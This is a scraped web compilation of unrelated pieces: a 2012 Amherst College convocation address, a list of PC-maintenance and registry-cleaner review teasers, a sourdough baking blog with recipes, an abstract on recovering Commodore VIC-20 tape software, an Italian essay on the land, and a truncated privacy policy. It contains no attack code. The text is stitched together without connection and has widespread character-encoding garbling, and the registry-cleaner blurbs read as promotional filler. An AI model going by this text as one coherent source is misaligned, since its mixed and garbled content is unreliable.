Prior to speaking to the first-years, Martin conferred honorary masterâs degrees on Catherine Epstein, professor of history and chair of her department; Jeffrey Ferguson, the Andrew W. Mellon Professor of Black studies and American studies; Caroline Goutte, professor of biology; Amelie Hastie, professor of English and film and media studies and chair of the film studies department; and Nasser Hussain, professor of law, jurisprudence and social thought. She also acknowledged Scott Kaplan â95, professor of computer science, who was also promoted to full professor but already holds an Amherst degree.
President Biddy Martinâs 2012 Convocation Address
Good evening, and welcome once again. We are gathered to mark the beginning of the academic year, to celebrate teaching and learning and to affirm their importance. We are lucky to be learning and teaching in a community of smart, curious and creative people. By the very nature of this event and its rituals, we commit ourselves to one another and to a larger world that desperately needs its Amhersts. We are all eager just to get on with it, but it makes sense to dwell, even if only briefly, on our work, our relationships, and, perhaps, even our fun.
I know the faculty feels fortunate to be teaching a student body with your talent, curiosity and diversity. You, who are our new and continuing students, are lucky to study with faculty who are contributing to their scholarly fields, creating new knowledge across disciplinary boundaries and investing their creativity in the art of teaching. The Amherst faculty treats teaching with same seriousness they bring to original research. I know from experience that such seriousness is rare.Â
In their senior survey, members of the Class of 2012 reported that their favorite teachers were the ones who had the highest expectations of them, who demanded their best work. This is a place that reveres the life of the mind and challenges us to continue a long tradition, a 191-year-old tradition of setting high standards.
In a meeting of Amherst alumni in the chapel last spring, I was asked by an alum what motivates serious scholars to spend their careers teaching undergraduates; âWhatâs in it for them?â I believe he asked. I had a response ready, based on my own experience as a teacher of both undergraduate and graduate students, but I caught sight of Professor Sarat, a political scientist, who happened to be standing in the back of Johnson Chapel; I asked him to come forward and give the audience his perspectiveâand he was glad to oblige. I want to read the summary account he sent me later, because what he said is representative of Amherst faculty as a whole. I cannot imagine any member of the faculty who would not agree. âAmherst classrooms at their best,â he said, âare places that combine love, challenge and hope. We want our students not just to learn, but to love ideas, images, mathematical equations.â
âLove,â he cautioned, âcannot be programmed, but it can be exemplified.â We want our students not only to learn, but also to love learning. He continued: âAt our best, we try to put our students in a place of productive discomfort â¦ we want to unsettle their taken-for-granteds. We want to challenge their moments of complacency. The return for those of us who teach, of seeing students take up the challenge, venture into that place of productive discomfort, is being inspired by their courage and reminded of what it is like to move beyond our own comfort zones.â
He concluded by saying, âI guess it is all about what they and we are willing to put at risk.â
I like the combination of challenge, love and hope. I like thinking about what it means to put our assumptions, even ourselves, at risk, within what is ultimately a pretty safe environment. If anyone among you doubts that it takes courage to question what we think we know or put our beliefs at risk, you need only look at the ideological rigidity in the world around us and consider the tenacious refusal in broad swaths of the public to accept scientific conclusions or listen to the views of others.
It takes particular courage to combat what we might call our willful ignorance, but we are here to do just that. By âwillful ignorance,â I mean the active suppression of knowledge or truth, the kind of ignorance that cannot be changed by the mere addition of new information. In moments of uncertainty and fear, we are particularly prone to indulging our ignorance, and the times are nothing if not uncertain. Our resistance to change is purposeful, but often only at an unconscious level by virtue of our stubborn internalizations.
Last week, [DeMott Lecturer] David Nevins [â88] told you that the most creative periods in his career have often been the most anxiety-ridden; they have come when he was making the transition from one job to another, before he knew the rules and had not yet internalized them. He encouraged you to take advantage of the transition you are making, giving yourselves permission to think otherwise. Permission of that sort requires a fight, because we are largely unaware of the structure of our ignorance, and our prejudices can be forms of love for those from whom we learned or absorbed them. Critical thinking cannot be programmed, but it can be exemplified, and it is our job to exemplify it. The quality of our institution depends on the willingness of students and faculty, and everyone who works here, to put their âtaken-for-grantedsâ at risk.
Amherst sometimes seems like a treasured island, a respite from the inanity or insanity or the ugliness in the world, but it is not an island, and we donât want it to be. We want it to be a platform or a launching pad for the work that needs to be done if we are to address the monumental challenges we faceâeconomic, environmental, political, social, cultural and psychological. Amherst provides an opportunity to acquire the skills and the quality of thought that is adequate to the problems; it is also an opportunity to learn how to engage and build relationships with people from all over the world; it is an opportunity to learn how to lead.
When I was in London visiting our alumni this summer, I asked some of my interlocutors how they accounted for their love of Amherst. âItâs a place,â said one, âwhere it was cool to be smart.â We are fortunate to be in a place where it is cool to be smart; cool to be different; cool to be an athlete who puts academics first or finds the right balance between the two; cool not to be an athlete; cool to sing, to dance, to stay up all night studying, even when there is no exam the next day; cool to grasp and appreciate the nature of reality and the complexity of our lives.
I have lots of wishes for you, but I will emphasize two: first, that you reject the substitution all around us of only dimly related bullet points for genuine analysis. I hope you will use your time here to hone your intellectual skills and use them to reach for an understanding of the worldâone that integrates the different modes of thought to which you will be exposed; one that displays close reading, critical thinking, analytical reason, creativity and a commitment to clear, compelling exposition. I hope you take full advantage of Amherstâs commitment to great writing and to other forms of creative expression. I hope you go beyond scattered âbullet pointsâ or decontextualized data to a working understanding, or an approach to understanding, that honors imagination, distinguishes between fact and fiction and remains open to new knowledge.
Second, I hope you find ways to let your leisure time be inflected by your intellectual development. It is popular here, as well as at other colleges and universities, to oppose play to work. âWork hardâplay hardâ becomes a kind of mantra, and sometimes a misguided one. I encourage you not to think of work and play as oppositions. Satisfying play is not the absence of work. It, too, takes cultivation and learning. And work is neither successful nor satisfying if it lacks experimentation, whimsy and fun. Play can be deadening when it is conceived only as an escape from thought. It is possible to relax and have fun, even to be a little oppositional, even a little bad, without suppressing all awareness and judgment. Â Â
You are here to learn not only how to be successful at work but also at play, and much of your playing will occur in relationships with your peers. Indeed, relationships will be a significant focus of your experimentation and growth while you are hereâthe friendships, love relationships, sexual ones. At least some of you will take an interest in sexuality. Good experiences and relationships cannot be programmed any more than the love of learning can, but they can be exemplified, and they will benefit from the work of thought. I will close with a good example of thought when brought to bear on questions of love and sexuality. In the early part of the 20th century, the German poet Rainer Marie Rilke wrote a letter to a young poet offering advice about the relationship between love, sensuality and work. Rilke warns the young poet against the tendency of young people to abandon themselves in pursuit of love or of one another, and he offers an account of love and marriage that has been cited many times over the past hundred years:
Like so much else, people have also misunderstood the place of love in life, they have made it into play and pleasure because they thought that play and pleasure were more blissful than work; but there is nothing happier than work, and love, just because it is the extreme happiness, can be nothing else but work. For one human being to love another: that is perhaps the most difficult of all our tasks; the ultimate, the last test and proof, the work for which all other work is but preparation â¦
but young people fling themselves at one another, when love takes possession of them, scatter themselves, just as they are, in all their untidiness, disorder, confusion â¦ And then what? Each loses himself [herself] for the sake of the other and loses the other and many others still to come. And loses the expanses and the possibilities, exchanges the approach and flight of gentle, divining things for an unfruitful perplexityâ¦
Physical pleasure is a sensual experience no different from pure seeing or the pure sensation with which a fine fruit fills the tongue; it is a great unending experience, which is given us, a knowing of the world, the fullness and the glory of all knowing. And our acceptance of it is not whatâs bad; the bad thing is that most people misuse and squander this experience and apply it as a stimulant at the tired spots of their lives and as a distraction instead of a rallying toward more exalted moments â¦ In marriage [relationships] the goal is not to create a quick community of spirit by tearing down and destroying all boundaries. A good marriage [relationship] is one in which each appoints the other guardian of his [her] solitude.
This last sentence is one of the most frequently cited passages in the letter. âA good [relationship] is one in which each appoints the other guardian of his [her] solitudeâ or separateness. Use your leisure, your play, your relaxation and your relationships with one another as a rallying toward the project of becoming who you are and letting others be engaged in the same work. Respect yourselves, your own boundaries and the boundaries of others.
Take yourselves and your fellow classmates seriously. And, in the process, enjoy! Welcome and welcome back to Amherst.
|Structure and Interpretation of Computer Programs||Hal Abelson and Gerald Jay Sussman Video Lectures at MIT.|
|Is Your Computer or Laptop Corrupted - 3 Top Warning Signs||During the lifetime of your PC or laptop, you will experience various common problems, such a decrease in the performance of your machine, plus additional DLL errors and the dreaded blue screen of death. In extreme cases your operating system will crash.|
|What to Do When a Computer Crashes||Most computer users have experienced this similar problem during the life of their machine. You might be playing games or doing some important and vital work. Suddenly your machine freezes and nothing moves no matter what you do.|
|Your Laptop Computer Doesn't Have to Be So Slow||A slow laptop or PC computer can happen for various reasons. When your machine starts to slow down in performance, you can become extremely frustrated and wish it was working just like when you first bought it.|
|Spyware - Don't Ignore The Dangers||Spyware is something that any computer user shouldn't ignore. It actually has become one of the major issues surrounding computer security today. Bluntly put, it is access to your computer system without your permission.|
|Why Is My Stupid Computer Freezing?||If your stupid computer or laptop is freezing from time to time, you must find it so frustrating, especially if you have important work to complete in a hurry. There are particular reasons why this does happen and you'll be glad to know that there is also a solution to this annoying problem.|
|How to Remove Trojan Horse Viruses Safely and Quickly||Do you need to know how to remove trojan horse viruses from your computer quickly and also safely? Don't worry, because there are solutions and you're not alone in having this common problem. As stated, most computer users will encounter the problems of spyware, adware or viruses.|
|How To Make Your Computer Run Faster||Do you know ways to speed up your computer or laptop? Is your PC slowing down and you are looking for ways to speed it up. Most of the problems such as a decrease in performance are mainly due to problems with your registry.|
|How to Fix Windows Blue Screen Errors Easily||Computer usage is essential in today's computer age. When we first bring our new laptop or PC home, it's like a new toy, all working great. However as with all machines, unless we perform essential maintenance on a regular basis, problems will probably occur. Unfortunately this is the case with most computers.|
|How To Remove Adware Quickly and Safely||Has your computer processing speed now slowed down to a snails pace. In addition you also appear to be getting these unwanted banners and pop ups appearing on your computer screen. Then you need to be aware that you have probably been infected with what is known as adware or spyware. It has been estimated by CNN that 90% of computers have been infected with spyware. It is usually occurs when you were surfing a new site or downloading music.|
|Here's a Quick Way to Fix a Slow Running Computer||Are you asking a very common question asked by most computer users "Why is my computer running so slow?" When you first get your new computer from the store, whether it be a laptop or PC, it runs at optimum performance and you get pleasure from using it.|
|My Computer Keeps Crashing - Has This Happened to You?||If you are asking the question "Why does my computer keep crashing?" then you are probably having problems with your computer registry and it's now time to take these problems seriously. If you just ignore them, then the crashes will get more frequent and in addition, you will probably also have DLL error messages appearing, the dreaded blue screen and a slow running computer performance which will keep getting worse. All in all, not good for the stress levels.|
|Your Must Know Guide For Getting Rid of Popups||Have you been suddenly plagued by annoying popups that have started to appear on your computer screen. They have now started to become so annoying that you would like a way to get rid of them. There is a safe and simple way to actually do this...|
|How to Get Rid of Adware and Spyware Safely||Computer users might treat the threat of adware and spyware such as pop ups as something of a annoying nuisance. However I must stress that there are more serious consequences if this malware is left to it's own devices. Adware and Spyware are among the one of the top growing risks confronting users and companies today and it should not be underestimated.|
|How to Speed Up Computer Performance||"Why is my computer running so slow" This is one of the questions that you will surely ask after you own your computer for a while. When you first bring your PC or laptop home in it's new box, it will be operating at optimum performance and it's a pleasure to use. However, unless you have already been doing preventive maintenance to the operating system, problems such as the computer performance getting slower will happen.|
|Get Rid of Spyware and Adware Before it Damages Your Computer||Are you being plagued by annoying adware popups that are suddenly appearing on your computer screen. In addition, if you noticing your computer slowing down and programs just taking too long to load, your homepage keeps changing, then you have probably been infected by spyware and adware. It must be stressed that you need to sort this out important issue as soon as possible before it damages your computer.|
|Registry Repair Software Reviews - Some Important Tips You Should Read||Are you asking one of the most common questions, asked at least once by all computer users, "Why Is My Computer Running Slow?" If your once lovely new PC is also crashing, then it's time to take a serious look at the best registry repair programs.|
|Why is My Computer Running Slowly?||Is your computer very slow and freezing? Unfortunately for most users you will encounter this common problem and in addition to add to your frustration there might be error messages and the dreaded blue screen. The reasons for your computer running slow can be threefold...|
|Why Does My Computer Crash?||The joy of owning a computer (PC or laptop) is a pleasure for most computer users, especially when we first get our new brand machine. Unfortunately over time, the system will get slower and will probably crash unless we do appropriate maintenance to the operating system.|
|How to Remove Spyware Infections Safely||If you have noticed problems such as your computer getting slower, annoying pop-up messages or too many error messages that appear on your screen, then probably you have been infected with malware such as adware and spyware. But please do not pass this problem off as annoying pop-ups, it is far more serious that that.|
|XoftSpySE Review - Does XoftSpySE Work to Remove Spyware From Your Computer?||If you are now starting have have annoying pop ups appear on your computer screen from nowhere, plus your operating system starting to slow down, then you probably have spyware or adware. You cannot let these problems just get worse because if you are not aware, spyware software will track your viewing habits on the web so as to bring you the relevant adds to display for you. It will also can leave your personnel and private information vulnerable.|
|NoAdware Review - Top Adware and Spyware Remover||If you are having annoying pop ups appearing on your computer screen with adverts which you do not definitely want and do not desire, then you have been infected with adware. In addition if you notice that you computer has got considerably slower then you probably have also got infected by spyware. This has happened when you probably were browsing some new site. This type of malware is very dangerous to have on your PC or laptop.|
|RegSweep Review - Is Reg Sweep Safe and Easy to Use?||When your computer slows down to a snail's pace and it takes forever to load, then it is time to sort out that important but overlooked part of your computer's operating system. It is called your computer registry and it is one of the most important parts of the computer's operating system. Here is stored all the settings for the important applications and games which reside on your computer.|
|How to Speed Up a Slow Computer With These Two Simple Tips||Is your computer running so slow that it is driving you crazy with frustration. In addition you are under additional stress because you have an important work to finish for a deadline tomorrow. You have even been online pricing the cost of an upgrade or even a new laptop, because it's not a pleasure any more to be working with your computer. The good news is that you probably won't have to upgrade. Here are 2 simple tips you should investigate before upgrading or purchasing another computer.|
|Easy Windows Registry Repair For Newbies||Windows Registry Repair - One of the major problems of being a computer user is that your computer will start to slow down at some point. When this happened to me it just drove me crazy. The slowness will probably get to a point where you feel you can go and do some shopping and then maybe Windows might have finally loaded.|
|How to Repair Windows Registry Errors Safely||Problems with your important computer registry can range from DLL errors, the dreaded blue screen, computer crashes and if that wasn't enough a slow running computer system where it takes just ages for everything to load. It will drive you so mad and leave you so frustrated that you feel like throwing the laptop or PC out of the window.|
|RegCure Review - Can You Speed Up Computer Performance With RegCure?||All computer users will come across the problem of slow performance and also computer crashes. When we first buy our computer and bring it home in a nice new box, it performs like a race horse and it is really a pleasure to use.|
|How to Fix Registry Problems Simply, Quickly and Safely||Most computer users are very much unaware of the important part that the computer registry plays in the optimum running of the computer operating system. It only comes to light when exasperating registry problems such as your computer running slow makes you now aware of it's importance.|
|How to Fix Computer Crashes||If you want to learn how to fix computer crashes, then you will definitely want to read this article. Specifically we will talk about why the computer crash develops, other relevant problems and how you can prevent this problem recurring. After reading this article you should be fix or prevent any future computer crashes.|
|How to Fix a Slow Running Computer||If you want to fix your slow running computer, then you want to read this article. We will discuss the 3 main reasons why you have this problem, from checking your important computer registry, to checking for virus, and finally also checking for spyware or adware. After reading this article you should be able to have your computer back up and running like new again.|
|Repair Windows XP Registry Errors With These 3 Simple Tips||Your windows registry is a complex system that holds specific files and all the information and commands that are required to have the computer run smoothly. Every time that you create a file, Windows sends information about that file to its registry.|
|Antivirus 2009 - How to Remove This Spyware From Your Computer Safely||The latest spyware to do the rounds and one of the most persistent is called Antivirus 2009. It is so annoying and yet so clever in the way that it is crafted. It is easy to see how one can be worried about the apparent spy are threat that you have been told exists on your computer. A lot of people will then go and download the software, then install it in order to fix the syware threat.|
|My Computer Keeps Crashing - Should I Throw it Out the Window?||If your computer keeps crashing like mine not so long ago, did you actually come to a point where you nearly threw it out the window? It got so frustrating and in addition the computer was running so slow that I thought it was entering the snails race. Such a change from the laptop that I bought.|
|Internet/Computer Blog||Articles and views on different topics like computers, blogging, Internet marketing, search engine optimization, and many other related topics.|
|Dec 2011 Daring Bakers' Challenge - Sourdough||Sorry for posting late but I'm on holidays away from my normal computer setup and this is the first chance I've had to get onto my blog.|
This month's Daring Bakers' challenge was sourdough, yes sourdough and yes we were asked to make a fresh starter for the challenge.
French Country Sourdough Picnic Loaf
I have a decade old starter called Boris (100% hydration i.e. equal weights of water and plain bread flour) so I decided to use that to make the French Country Loaf recipe. I started the process at Day 4 in the instructions. Since I had Boris already made up I saved four days. I have started a new sourdough starter to use in a few days time. In Sydney Australia it is the start of summer so I made a stuffed picnic loaf with the baked bread one of my favourite summer picnic foods.
I used "OO" finely steel-milled bread flour and "OO" finely cold-steel-milled whole wheat flour with some stabilised wheat germ (since I couldn't find my stone ground flour).
Boris my (100% hydration) starter, before I fed it to make the Leaven Starter, notice how Boris is burping gas
Boris feeding on the extra flour and water, notice the condensation on the top of the plastic lid which indicates that the yeastie beasties and bacteria are very active making lots of gas and tasty flavour for the sourdough
Boris full of tiny active bubbles after feeding
Comparison of Boris (left) when he is made into the leaven for the sourdough (right) in the French country loaf. Notice how wet and soft the leaven is for this recipe!
The loaf proofing for the final raise in a greased pan (I didn't want flour on the outside of the picnic loaf) before it is tipped out and slashed. The unbaked loaf is very soft and needs a mould.
The baked loaf (the unbaked loaf is very wet and soft and forms a great shape when baked) the final loaf shape is formed by squeezing (the soft out-turned unbaked loaf) with your hands, then you quickly slash it and place immediately into a very hot oven and turn the temperature to hot for 10 mins and then to the recipe temperature for the rest of the time.
Making the picnic loaf
Hollow out the loaf, notice how moist the interior is and the 'greyish' colour which is a indication of the sourdough starter. The crumb (the texture of the interior) of the loaf is like dense sponge really good I thought, notice the dense spongy crumb in the hollowed out top of the loaf (bottom piece in the photo below).
Line the hollow with several layers of thin ham, and then fill with a combination of ricotta cheese, chopped charred-grilled red capsicums (fire-roasted red bell peppers), spinach, basil, finely chopped spicy smoked French sausage, grated sharp cheese and lots for black pepper. The filling ingredients can be varied to suit your own tastes a great version is the famous Muffuletta sandwich (the filling is an olive paste with various cheeses and sliced meats).
Wrap tightly with plastic film and place into the fridge with a light weight on top of the loaf for a few hours (up to two days)
The finished picnic loaf
Close-up of a slice of the picnic loaf yum yum
The verdict - this recipe produces a sourdough unlike anything I have done before the crumb of the loaf is very moist almost sponge-like which I really really liked and it is a perfect foil for the pressed filling ingredients since they almost have the same texture which is what you want in a picnic loaf. Also the picnic loaf slices cleanly and thinly. I bet for an extra special treat slices of this picnic loaf would fry up beautifully. I will be using this recipe from now on to make picnic loaves.
What to do with the leftover starter
You can make a lot of recipes with the leftover starter examples pancakes, cakes, scones etc. In this case I made crumpets with the leftover starter (To make the batter - to one cup of starter, sprinkle over the surface 1 teaspoon of sugar and 1/2 teaspoon salt and 1/2 teaspoon baking soda (or 1-1/2 teaspoons of baking powder), stir well, the mixture will double in volume. Dry fry 1/4 cup scoops of the batter in well greased 3" (7-1/2 cm) metal rings on a medium-low heated griddle (or fry pan) for 4-6 minutes on the bottom and optionally 30 seconds on the top if you like colour on both top and bottom of your crumpets.) These crumpets were so good I love how the holes form and the moist texture of the crumb so much better than the store bought version. You can freeze the leftover starter/leaven and the cooked crumpets.
Comments and notes
1. This recipe is unusual in that you knead the leaven into the dough.
2. The leaven is very wet and soft more like soft putty so when you form the disk of dough and place the leaven onto it and knead it, the final dough-making is incredibly messy and the final dough is very very soft and spreads out very slowly (takes about 20 mins) if left on the counter. I had to add about 3 tablespoons of extra flour to make it a little stiffer.
3. The final interior of the loaf is very moist, as compared to my normal sourdough. I really liked the final interior and the loaf. The crumb (the texture) of the interior was like soft dense sponge even slightly doughy which I really liked. The weight of the loaf feels very heavy for its size.
4. What to make with the leftover starter make crumpets see links below for the recipe.
What to do with the discarded starter (use to make crumpets)
And what to do with a neglected starter
5. A plain flour starter seems to work very well for this recipe.
French Country Sour Dough Open-faced sandwiches with home-made pesto, tomatoes and cured Italian ham
I made the French country loaf its starter was very easy to make and look after until it was active it only took three days for the starter to become super active since I feed it twice a day and the starter was in a moist warm environment for the entire 'brewing' time. I made up the loaf has per the recipe I used very coarse stone ground whole meal bread flour and "OO" finely milled bread flour. The dough rose in about 2 hours (really quick for a sour dough) and to twice it original volume and when baked stayed exactly the same size. Since I used such coarse flour the final texture of the crumb was very grainy. My dough was so wet and soft it really needed a mould but that was no problem.
I wanted perfectly shaped sandwiches which means the crust has to be very smooth with crisp edges, so I went for a 'brick-shape' loaf that could be cut thinly and cleanly while having the strength so the bread slice wouldn't break or bend when the sandwich is being eaten.
The final texture of the loaf was like a Rye European sour dough bread, not dense at all in fact, the loaf could be cut very thinly and cleanly - perfect for open-faced sandwiches.
I had the most beautiful tomatoes and basil so I had to use them as the topping for my sandwiches.
This summer in Sydney Australia has been the coldest in the last fifty-one years, so I took special precautions in keeping the starter warm that is by enclosing the plastic container in several tea-towels on the counter on the spot that is above the hot water system. The temperature was gorgeously warmish at all times, so after three days the starter was full of energy and going for it. If you feed the starter once in the morning and in the evening it shortens the time for the starter to become active.
The starter covered in many tea towels over a warm spot on the counter, it is toasty in there:)
I wanted to make thin open-faced sandwiches so I coated my pan with oil-spray and then with wheat germ flakes which produces a thin smooth crust on the loaf
Notice the nice straight edges and smooth faces on the loaf, it looks like a brick! Perfect for open-faced sandwiches.
Close up of the crust of the loaf
Some more photos of the loaf and the thin slices that can be cut from it
I really like how thin you could slice the loaf
To make the open-faced sandwiches
Finished sandwiches with home made pesto, tomatoes and cured Italian ham and a piece of tangy goat's cheese
The verdict - a very tasty open-face sandwich bread wonderful with the tomatoes and pesto. And so filling only a couple of quarter slices where enough. Just like the old fashioned country breads I had in my childhood.
1. You can speed up the 'brewing' time of the starter by twice feeding it a day and making sure that the starter is in a moist warm place.
2. My starter was super active it rose the dough in about two hours which is very quick.
3. The final dough was too soft to be shaped into a free-form loaf it really needs a mould.
4. The final crumb is very much like the classic black bread style of Northern Europe.
Cornmeal sourdough loaf
I used the French Country starter to make a cornmeal soudough loaf that was more traditionally shaped. I replaced the whole meal flour with corn meal (polenta) I added some pure gluten flour to replace the missing gluten from the corn meal and raised the dough in a bowl lined with linen that was covered in flour and cornmeal.
This is the largest loaf of bread I have made it was 12 inches (30 cms) in diameter and weighed almost 2-1/2 kgs (5-1/2 lbs)! It took about an hour and a quarter to bake.
The dough is very wet and soft
The dough raising in the lined bowl
How to raise the dough during cold weather, place a plastic bag over the bowl and place that over a saucepan 3/4 filled with warm water also you can wrap the saucepan in tea towels this will keep your dough warm for many hours even overnight.
The final baked loaf
The underside of the baked loaf a wonderful yellow colour
I will use the loaf tomorrow after it has cooled down and the flavours have settled.
I love the look of this loaf so rustic with lots of character in the crust and the yellow colour is stunning.
Cornmeal Sourdough Loaf part II
I use my cornmeal sourdough loaf today I was extremely pleased with the look, taste and texture of the slices. I had some beautiful beet(root) and mint on hand so I made a spicy beetroot mint dip to serve with the cornmeal bread.
Lovely beet(root) and mint
The yellow cornmeal bread sliced into wedges so colourful and tasty
The beet(root) and mint dip served on the cornmeal sourdough slices
Another photo of the delicious bread
Gorgeous White Sourdough
One thing about sourdoughs is that they can look so beautiful as compared to the store bought loaves. I made another loaf using the French Country starter but using all white flour for the loaf. I had to add about 1/4 cup of extra flour to the dough so that the shaped loaf would hold its shape and be slashed. I double egg-washed the loaf which really gave the baked loaf a lovely shiny gloss finish. I will use it tomorrow after the loaf has had time to settle and mellow. I cannot wait.
I used a five cup "flower-pot" shaped container which gives a nice visual proportion to the loaf
Some gorgeous photos of the final loaf
White Sourdough Loaf
I made tandoori roast chicken to serve with the white sourdough loaf I had made yesterday. The crumb of the sourdough was very smooth and its hue was a light sand colour which was unexpected since I used a very white flour for the dough. The thinly sliced chicken was lovely on the sourdough sandwich. The crumb of the loaf was very similar to white wonder bread a wonderful bread for sandwiches.
The white sourdough loaf being sliced
The tandoori roast chicken I adore the vibrant colour of the chicken
The final tandoori chicken sandwich
White sourdough loaf
I repeated making a white flour sourdough but this time I added some more flour in the final stage so that the loaf would spread out so much and would hold it shape when slashed. I needed about 1 cup of extra flour to achieve the correct consistency. I was very pleased with the final result. The loaf expanded about three times it was incredible to watch it grow and bake in the oven.
More things to make with the leftover starter part II
Wholesome banana and date sourdough bread
I had a cup of very sour active starter left so I thought I would make my favourite banana/date bread with it, I make this recipe about once a fortnight during the summer. The recipe is easy -
Wholesome banana and date sourdough bread
1 cup starter (the starter doesn't need to be active)
2 cups wholemeal flour
2 teaspoons baking powder
1/2 teaspoon baking soda
1/2 teaspoon salt
1/4 cup brown sugar
3 tablespoons olive oil (or melted butter)
3 tablespoons dried milk powder (or buttermilk powder)
3 tablespoons wheat-germ
1 large egg, lightly beaten
3 large ripe bananas, mashed
1 cup of dates finely chopped, soaked in orange juice until soft
(Optional 1/2 cup of chopped walnuts)
Sift together the flour, baking powder, baking soda, milk powder and salt, form a well in the centre of the dry ingredients. Pour into the well the sourdough starter, oil, wheat-germ, egg, brown sugar, banana and dates (and the nuts if using). Whisk the ingredients together until a normal "cake" batter consistency is formed you can add more water if you need to loosen the batter. Bake in a moderate oven 160C/320F/gas mark 3 for 1-1/2 hours until a skewer comes out clean, check at 1 hour and then every 10 mins until done. Best if left for one day before slicing, but can be sliced when completely cooled. The bread will last for 2 weeks (at least! I have always eaten it before this) in the fridge covered in foil and plastic wrap and it gets better and better with time, fabulous toasted and served with butter. The slices are super moist and not too sweet. The sourdough and bananas really makes for a moist bread.
White sourdough loaf
I decided to make a treat for this delicious bread that is meatloaf which I really really like a lot in Australia it isn't that common basically nobody I know makes meatloaf but every time I make it the meatloaf gets rave reviews.
For a super special treat I baked the meatloaf on two slices of the white bread these slices therefore get toasted and are dripping with gorgeous flavour I'm sure that they aren't not that healthy but once in while it is such a flavoursome treat.
The meatloaf notice the two slices of white sourdough bread that acts as a soak of all the juices
The delicious slices of bread that have been baked and basted throughout the cooking of the meatloaf
The cut meatloaf. My meatloaf contains grilled red capsicums (the red pieces), shredded seaweed (the black pieces) and lots of herbs and a mixture of pork and veal with some BBQ duck and the glaze is a mixture of tomato pesto, black sugar and balsamic vinegar.
|Recovery of heritage software stored on magnetic tape for Commodore microcomputers|
Digital games make up a significant but little known chapter in the history of the moving image in Australia and New Zealand.Â Beginning in the early 1980s, the Australasian software industry developed a remarkable record of content creation. The ``Play It Again'' project is conducting research into the largely unknown histories of 1980s game development in Australia and New Zealand, ensuring that local titles make it into national collections and are documented and preserved, enabling the public to once again play these games.
Microcomputers from the 1980s made extensive use of compact audio cassettes to distribute software as an inexpensive alternative to the floppy disk technology available at the time. Media from this era are at risk of degradation and are rapidly approaching the end of their lifespan. As hardware platforms and peripheral devices become obsolete, access to the data for future scholars and other interested parties becomes more difficult. In this article, we present a case study, wherein we investigate the issues involved in making digital copies with a view to the long term preservation of these software artefacts.
A video game title stored on standard compact cassette for Commodore's popular VIC-20 machine, ``Dinky Kong'' by Mark Sibley was recorded using both inexpensive amateur and professional playback equipment. The audio files obtained were processed using freely available software, alongside a customised decoder written in MATLAB and Perl. The resulting image files were found to be playable using an emulator. More importantly, the integrity of the data itself was verified, by making use of error detection features inbuilt to the Commodore tape format, which is described in detail.
Issues influencing the quality of the recovered image files such as the bit rate of the digital recording are discussed. The phenomenon of audio dropout on magnetic tape is shown be of some concern, however there exist signal processing techniques to compensate for such errors.
The end result of the imaging process was a file compatible with a popular Commodore VIC-20 emulator, the integrity of which was verified by using inbuilt checksums.
|LA TERRA (per un nuovo umanesimo)|| |
Viviamo lontani dalla terra ed in un graduale distacco dalla carne (ma questa Ã¨ un'altra amnesia). Calchiamo la terra con i piedi, ma la conosciamo sempre meno, non la tocchiamo con le mani, non lasciamo orme a piedi nudi. Il fango va lavato, gli stivali e le scarpe ci proteggono, i pneumatici ci portano rapidamente da qui a lÃ senza quasi nessun contatto.
Fra noi e la terra abbiamo frapposto degli intermediari sconosciuti, gente lontana, che spesso parla altre lingue e viene ancora a patti con una terra lontana, ma purtroppo non per sÃ© lavorano, ma per altre organizzazioni ancora. Enormi golem finanziari raccolgono il lavoro di questi contadini spesso disperati, grano, soia, mais, patate, zucchero, cotone e caffÃ© e lo lavorano, lo trasformano, lo alterano chimicamente, lo confezionano e lo imballano. Spesso da un'estremitÃ del pianeta riforniscono la parte opposta, caricando tutto su navi, treni, container, camion. Il materiale deperibile viene stipato nei frigo e rifornisce enormi ipermercati, dove si vendono cibo, computer,pupazzi di pelouche, biciclette e aspirapolvere.
Le macchine non hanno bisogno di cibo, ma necessitano di elettricitÃ . Il proliferare delle macchine ingurgita risorse in modo insostenibile, aliena la terra all'uomo, contamina l'acqua e svuota i fiumi. L'uomo ridotto a macchina ignora la terra, si rifornisce spesso acriticamente di combustibile organico, ma ha perso il contatto con la terra che abita. L'agricoltura nei paesi âsviluppatiâ ed in Italia in particolare langue. Eppure il fabbisogno di cibo sale.
Dove si alimenta la contraddizione fra l'abbandono dell'agricoltura, dell'autosostentamento e della capacitÃ di render fertile la terra, a cui corrisponde per contro un aumento delle necessitÃ alimentari? Il ritorno dell'uomo, la fine del suo travestimento a macchina biologica, la riconquista della coscienza e dello spirito per un nuovo umanesimo, cercano un piano d'appoggio e questo piano d'appoggio Ã¨ la terra.
Senza la fatica, senza la pioggia e il letame, senza la vanga e la zappa, siamo condannati a rifornirci di nulla organico, facendo del cibo una sosta ad una stazione di servizio dotata di ampio parcheggio. Le mani nel fango sono un battesimo, le unghie sporche e la schiena indolenzita testimoniano di un'autenticitÃ perduta fra questi alimenti sigillati nel polietilene.
Non Ã¨ una romantica lotta di retroguardia, piÃ¹ semplicemente mangiare taralli fatti con i cereali per i maiali ci uccide, cosÃ¬ come ci uccidono molti artefatti cibi moderni: non sono adatti all'organismo, non sono dono fresco della terra.
L'intendimento di terra come risorsa, come luogo dove massimizzare la produzione e le prestazioni, esattamente come si parlasse di un qualsiasi prodotto elettronico, Ã¨ un intendimento che non solo ci esclude da una relazione con la terra, dal ringraziamento per i frutti che cosÃ¬ generosamente ci dÃ , ma inesorabilmente avvelena prima l''anima e poi il corpo, mancando appunto una relazione, una dedizione ed un rispetto, che alla fine sono parte integrante del prodotto finale: il cibo.
Ridurre il cibo ad un combustibile Ã¨ un suicidio, abbandonare la terra Ã¨ solo preparare un esilio volontario ed inconsapevole.
The privacy of our visitors to this website is important to us.
At this website, we recognize that privacy of your personal information is important. Here is information on what types of personal information we receive and collect when you use and visit this website, and how we safeguard your information. We never sell your personal information to third parties.
As with most other websites, we collect and use the data contained in log files. The information in the log files include your IP (internet protocol) address, your ISP (internet service provider, such as AOL or Shaw Cable), the browser you used to visit our site (such as Internet Explorer or Firefox), the time you visited our site and which pages you visited throughout our site.
Cookies and Web Beacons
We also use third party advertisements on this website to support our site. Some of these advertisers may use technology such as cookies and web beacons when they advertise on our site, which will also send these advertisers (such as Google through the Google AdSense program) information including your IP address, your ISP , the browser you used to visit our site, and in some cases, whether you have Flash installed. This is generally used for geotargeting purposes (showing New York real estate ads to someone in New York, for example) or showing certain ads based on specific sites visited (such as showing cooking ads to someone who frequents cooking sites).
DoubleClick DART cookies
